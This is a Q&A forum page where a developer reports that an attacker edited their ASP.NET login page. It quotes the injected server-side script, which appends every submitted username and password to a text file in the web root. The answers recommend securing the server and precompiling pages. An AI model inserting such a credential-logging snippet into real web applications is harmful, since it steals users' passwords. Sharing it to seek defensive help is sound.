Felipe Saboya
Reputation: 51
How to not allow editing of the web page aspx?
Yesterday my web application has been changed by a virus, who edited the login page. When I opened the aspx file I came across the following script:
<script runat="server">
protected void btnLogin_Click(object sender, EventArgs e)
{
using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\Inetpub\wwwroot\...\ldaptxt2.txt", true))
{
file.WriteLine(username.Text + "|" + password.Text);
}
}
</script>
Does anyone know how to not allow this?...
Upvotes: 0
Views: 98
Answers (2)
David Crowell
Reputation: 3813
Anyone who can modify the aspx pages can also replace the assemblies in your bin folder. The correct thing to do is to secure the web server.
Upvotes: 1
Vadim
Reputation: 29
Best practice is to Precompile your views and code behind files on production environment.
http://msdn.microsoft.com/en-us/library/vstudio/bb398860(v=vs.100).aspx
Upvotes: 1
Related Questions
- How to make textbox as not editable in asp.net(c#)
- Making Text box not editable
- Make the Link NOT Editable asp.net c# Page
- How to make aspx pages Read Only?
- An easy way to prevent hack by changing DOM in browser?
- Deny access to html page
- How to prevent user from editing asp:TextBox directly?
- Preventing user from saving of web pages in Asp.net
- How do i lock an asp.net page from multi-user editing?